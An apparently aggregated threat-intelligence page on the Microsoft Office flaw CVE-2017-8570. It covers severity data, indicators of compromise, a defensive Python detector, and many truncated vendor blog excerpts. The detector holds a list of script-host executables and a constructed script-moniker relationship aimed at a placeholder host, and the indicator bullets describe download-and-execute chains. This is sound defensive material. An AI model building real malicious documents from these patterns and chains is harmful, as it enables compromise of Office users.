CVE-2017-8570
Published: 2017-07-11
Priority: P1 · 85 · high · CVSS 3.1: 7.8
CVSS 3.1 vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · remediation due 2022-08-25
Exploited in the wild
EPSS: 89.89% (99.8th percentile)
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | business_productivity_servers | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | web_applications | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
Detection & IOCs (extracted from sources)
- The malicious PPSX file exploiting CVE-2017-8570 (actually CVE-2017-0199) triggers a script moniker embedded in ppt/slides/_rels/slide1.xml.rels; hunt for PPSX files containing script monikers in that relationship file path.
- The exploit payload (logo.doc) is not a Word document but an XML file containing JavaScript that spawns PowerShell to download and execute RATMAN.EXE; detect PowerShell child processes spawned from PowerPoint (POWERPNT.EXE).
- Patchwork group used PPSX files exploiting CVE-2017-8570 to download a malicious Windows Script Component (SCT) file from attacker-controlled servers and deliver xRAT malware; monitor for PPSX attachments that initiate outbound SCT/scriptlet downloads.
- Agent Tesla campaigns leverage CVE-2017-8570 via specially-crafted Office documents; detect Office processes spawning unexpected child processes or network connections after opening .doc/.docx/.rtf files.
- The PPSX exploit file displays the text 'CVE-2017-8570' as a decoy while actually exploiting CVE-2017-0199; this mislabeling is a toolkit artifact that can be used as a lure-content indicator in sandbox analysis.
- The PPSX sample analyzed by Trend Micro displays 'CVE-2017-8570' as on-screen text but actually exploits CVE-2017-0199; IOCs from this sample (hashes, IPs, URLs) are associated with a CVE-2017-0199 exploit chain, not a pure CVE-2017-8570 chain.
- The 192.166.218.230 IP is described as a VPN or hosting service abused by the attacker, meaning it may be shared infrastructure and not exclusively malicious.
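The two hunting ideas in the bullets above (script monikers in the slide relationship part, and a script host spawned by an Office process) written out as runnable detection logic. This is an added example, not code from this page or from any of the cited vendors. It assumes a constructed PPSX-shaped zip fixture, a constructed Sysmon-like key=value event layout, and hypothetical parent/child process lists (OFFICE_PARENTS, SCRIPT_HOSTS) that a team would tune locally; the script: target URL is a placeholder.

```python
"""Two defender-side checks for the CVE-2017-8570 indicators listed above.
(1) OOXML packages (PPSX/PPTX/DOCX are zips): flag external relationships in any
    *.rels part whose target uses an unexpected URL scheme such as script:.
(2) Process-creation events: flag an Office parent launching a script host.
All sample inputs below are constructed fixtures, not real samples."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"  # ECMA-376
BENIGN_SCHEMES = {"http", "https", "mailto"}  # normal external link schemes
# Hypothetical lists (assumption): tune to the binaries seen in your estate.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}


def find_suspicious_rels(package_bytes: bytes) -> list:
    """One finding per external relationship whose scheme is not benign."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:  # a broken .rels part is itself worth a look
                findings.append({"part": name, "id": None, "target": None,
                                 "reason": "unparseable .rels part"})
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                scheme = urlsplit(target).scheme.lower()
                if scheme and scheme not in BENIGN_SCHEMES:
                    findings.append({"part": name, "id": rel.get("Id"), "target": target,
                                     "reason": f"external target uses '{scheme}:' scheme"})
    return findings


def build_sample_package(slide_rels_xml: str) -> bytes:
    """Minimal PPSX-shaped zip (constructed fixture) with a caller-supplied slide1 rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml",
                    '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


_RT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{_RT}slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    f'<Relationship Id="rId2" Type="{_RT}hyperlink" Target="https://example.com/" TargetMode="External"/>'
    "</Relationships>"
)
# Constructed indicator: an external relationship whose target is a script moniker (placeholder URL).
SUSPECT_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{_RT}slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    f'<Relationship Id="rId3" Type="{_RT}oleObject" Target="script:http://placeholder.invalid/x.sct" TargetMode="External"/>'
    "</Relationships>"
)

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key="quoted value" or key=bare


def parse_event(line: str) -> dict:
    """Parse one key=value process-creation line (constructed layout)."""
    return {k: q or b for k, q, b in _KV.findall(line)}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawned_script_host(line: str) -> bool:
    """True when an Office parent process launches a script host child."""
    ev = parse_event(line)
    return (_basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
            and _basename(ev.get("Image", "")) in SCRIPT_HOSTS)


# Constructed events; only the first should fire.
SAMPLE_EVENTS = [
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE" User=CORP\\alice',
    'EventID=1 Image="C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE" '
    'ParentImage="C:\\Windows\\explorer.exe" User=CORP\\alice',
    'EventID=1 Image="C:\\Windows\\System32\\notepad.exe" ParentImage="C:\\Windows\\explorer.exe" User=CORP\\bob',
]


def flag_events(lines: list) -> list:
    return [line for line in lines if office_spawned_script_host(line)]


if __name__ == "__main__":
    for f in find_suspicious_rels(build_sample_package(SUSPECT_RELS)):
        print("rels finding:", f)
    for line in flag_events(SAMPLE_EVENTS):
        print("process finding:", line)
```

The package check deliberately walks every `.rels` part rather than only `ppt/slides/_rels/slide1.xml.rels`, because the same relationship mechanism exists in Word and Excel packages and in other slides; the process check keys on image basenames so it is path-independent, and both checks return structured findings so they can be asserted on or forwarded to a SIEM rather than only printed.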
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.8 | HIGH | — |
| cisa | — | 7.8 | HIGH | — |
| vendor_msrc | — | 7.8 | HIGH | — |
GHSA: GHSA-c2m8-mp3j-qvvc for CVE-2017-0243 (ghsa_unreviewed · 2022-05-17 · CVSS 7.8 · HIGH · CWE-119)
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-8570.
GHSA: GHSA-p72w-9mwc-fgvp for CVE-2017-8570 (ghsa_unreviewed · 2022-05-13 · CVSS 7.8 · HIGH)
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
VulnCheck: Microsoft Office Remote Code Execution Vulnerability (vulncheck · 2017 · CVSS 7.8 · HIGH)
A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf; https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/; https://ti.qianxin.com/blog/articles/latest-activity-of-apt-c-35/; https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html; https://www.recordedfuture.com/blog/top-vulnerabilities-2018; https://www.antiy.cn/research/notice&report/research_report/20200522.html; https://www.anomali.com/blog/ba
CISA: Microsoft Office Remote Code Execution Vulnerability (cisa · 2022-02-25 · CVSS 7.8 · HIGH)
Vulnerability: Microsoft Office Remote Code Execution Vulnerability
Affected: Microsoft Office
A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8570
Remediation Due Date: 2022-08-25
Microsoft: Microsoft Office Remote Code Execution Vulnerability (vendor_msrc · 2017-07-11 · CVSS 7.8 · HIGH)
Description: A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user.
To exploit the vulnerability, a user must open a specially crafted file with an affected version of Microsoft Office software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an
No detection rules found.
Securelist: PC malware statistics, Q3 2023 (blogs_securelist · 2023-12-01)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist: IT threat evolution in Q3 2023. Non-mobile statistics (blogs_securelist · 2023-12-01)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Qualys: Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys (blogs_qualys · 2023-09-04 · CVSS 7.8 · HIGH)
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys: Qualys Top 20 Most Exploited Vulnerabilities (blogs_qualys · 2023-09-04 · CVSS 7.8 · HIGH)
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist: IT threat evolution in Q2 2023. Non-mobile statistics (blogs_securelist · 2023-08-30)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist: PC malware statistics, Q2 2022 (blogs_securelist · 2023-08-30)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Qualys: Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition) (blogs_qualys · 2023-07-18)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Securelist: Non-mobile malware statistics, Q1 2023 (blogs_securelist · 2023-06-07)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist: IT threat evolution in Q1 2023. Non-mobile statistics (blogs_securelist · 2023-06-07)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Tenable: Cybersecurity Snapshot: 6 Things That Matter Right Now (blogs_tenable · 2022-08-19)
Securelist: IT threat evolution in Q2 2022. Non-mobile statistics (blogs_securelist · 2022-08-15)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
TOP 10 countries and territories that serve as sources of web-based attacks
Countries and territories where users faced the greatest risk of online infection
Local threat
Securelist: Non-mobile malware statistics, Q2 2022 (blogs_securelist · 2022-08-15)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2022
- IT threat evolution in Q2 2022. Non-mobile statistics
- IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
- Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
- Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware fo
Tenable: Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021 (blogs_tenable · 2022-08-04)
Securelist: IT threat evolution in Q1 2022. Non-mobile statistics (blogs_securelist · 2022-05-27)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
TOP 10 banking malware families
Ransomware programs
Quarterly trends and highlights
Law enforcement successes
HermeticWiper, HermeticRansom and RUransom, etc.
Conti source-code leak
Attacks on NAS devices
Maze Decryptor
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarter highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat
Securelist: PC malware statistics, Q1 2022 (blogs_securelist · 2022-05-27)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2022
- IT threat evolution in Q1 2022. Non-mobile statistics
- IT threat evolution in Q1 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2022:
- Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.
- Web Anti-Virus recognized 313,164,030 unique URLs as malicious.
- Attempts to run malware
Securelist: IT threat evolution in Q3 2021. PC statistics (blogs_securelist · 2021-11-26)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Attack on Kaseya and the REvil story
The arrival of BlackMatter: DarkSide restored?
Q3 closures
Exploitation of vulnerabilities and new attack methods
Number of new ransomware modifications
Number of users attacked by ransomware Trojans
Geography of ransomware attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by cybercriminals during cyberattacks
Quarter highlights
Statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries tha
Securelist: IT threat evolution in Q3 2021. PC statistics (blogs_securelist · 2021-11-26)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Number of users attacked by ransomware Trojans
- Geography of ransomware attacks
- Top 10 most common families of ransomware Trojans
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution Q3 2021
- IT threat evolution in Q3 2021. PC statistics
- IT threat evolution in Q3 2021. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2021:
- Kaspersky solutions blocked 1,098,968,315 attacks from online reso
Securelist: IT threat evolution in Q2 2021. PC statistics (blogs_securelist · 2021-08-12)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2021:
- Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
- Web antivirus recognized 675,832,360 unique URLs as malicious.
- Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
- Ransomware attacks were defeated on the computers
Securelist: IT threat evolution Q3 2020. Non-mobile statistics (blogs_securelist · 2020-11-20)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Attack geography
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Oleg Kupreev
Evgeny Lopati
Securelist: IT threat evolution Q3 2020. Non-mobile statistics (blogs_securelist · 2020-11-20)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexey Kulaev
- Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Talos: Lemon Duck brings cryptocurrency miners back into the spotlight (blogs_talos · 2020-10-13)
By Vanja Svajcer, with contributions from Caitlin Huey.
- We are used to ransomware attacks and big-game hunting making headlines, but there are still methods adversaries use to monetize their efforts in less intrusive ways.
- Cisco Talos recently recorded increased activity of the Lemon Duck cryptocurrency-mining botnet using several techniques likely to be spotted by defenders, but are not immediately obvious to end-users.
- These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1203 (Exploitation for Client Execution), T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1035 (Service Execution), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1053 (Scheduled Task), T1562.004
Securelist: IT threat evolution Q2 2020. PC statistics (blogs_securelist · 2020-09-03)
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Securelist: IT threat evolution Q2 2020. PC statistics (blogs_securelist · 2020-09-03)
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trend highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Geography of attacks
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on Apple macOS
Threat geography
IoT attacks
IoT threat statistics
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor
Sentinelone: Agent Tesla | Old RAT Uses New Tricks to Stay on Top - SentinelLabs (blogs_sentinelone · 2020-08-10)
As other researchers have recently noted, the Agent Tesla RAT (Remote Access Trojan) has become one of the most prevalent malware families threatening enterprises in the first half of 2020, being seen in more attacks than even TrickBot or Emotet and only slightly fewer than Dridex. Although the Agent Tesla RAT has been around for at least 6 years, it continues to adapt and evolve, defeating many organizations’ security efforts. During the COVID-19 pandemic new variants have been introduced with added functionality, and the malware has been widely used in Coronavirus-themed phishing campaigns.
## Agent Tesla | Background & Overview
Agent Tesla is, at its core, a keylogger and information stealer. First discovered in late 2014, there has been steady growth in the use of Agent Tesla over th
Sentinelone: Agent Tesla | Old RAT Uses New Tricks to Stay on Top (blogs_sentinelone · 2020-08-10)
As other researchers have recently noted, the Agent Tesla RAT (Remote Access Trojan) has become one of the most prevalent malware families threatening enterprises in the first half of 2020, being seen in more attacks than even TrickBot or Emotet and only slightly fewer than Dridex. Although the Agent Tesla RAT has been around for at least 6 years, it continues to adapt and evolve, defeating many organizations’ security efforts. During the COVID-19 pandemic new variants have been introduced with added functionality, and the malware has been widely used in Coronavirus-themed phishing campaigns.
## Agent Tesla | Background & Overview
Agent Tesla is, at its core, a keylogger and information stealer. First discovered in late 2014, ther
Zscaler: G-Drive is tapped by a Multistage Malware Downloader | Blog (blogs_zscaler · 2020-03-25)
Qualys: Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking (blogs_qualys · 2019-12-27 · CVSS 8.8 · HIGH)
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
| No. | CVE | Products Affected by CVE | CVSS Score (NVD) | Examples of Threat Actors |
|---|---|---|---|---|
| 1 | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) |
| 2 | | | | |
Qualys: Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys (blogs_qualys · 2019-12-27 · CVSS 8.8 · HIGH)
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Securelist
IT threat evolution Q2 2019. Statistics
blogs_securelist·2019-08-19
IT threat evolution Q2 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
- 217,843,293 unique URLs triggered Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Sentinelone
FormBook Anti-Analysis Techniques and Indicators of Compromise
blogs_sentinelone·2019-05-02·CVSS 7.8
CVE-2017-8570 [HIGH] FormBook Anti-Analysis Techniques and Indicators of Compromise
FormBook is yet another Stealer malware. Like most stealer malware, it performs many operations to evade AV vendors when deploying itself on a victim’s machine. And of course as we see with Ursnif, Hancitor, Dridex and other trojans, there are many variants with more than one way to receive the payload.
In the past year the threat actor’s favorite method of distributing FormBook has been via malspam and the use of CVE-2017-8570, using an `.RTF` file format with malicious code to exploit this vulnerability.
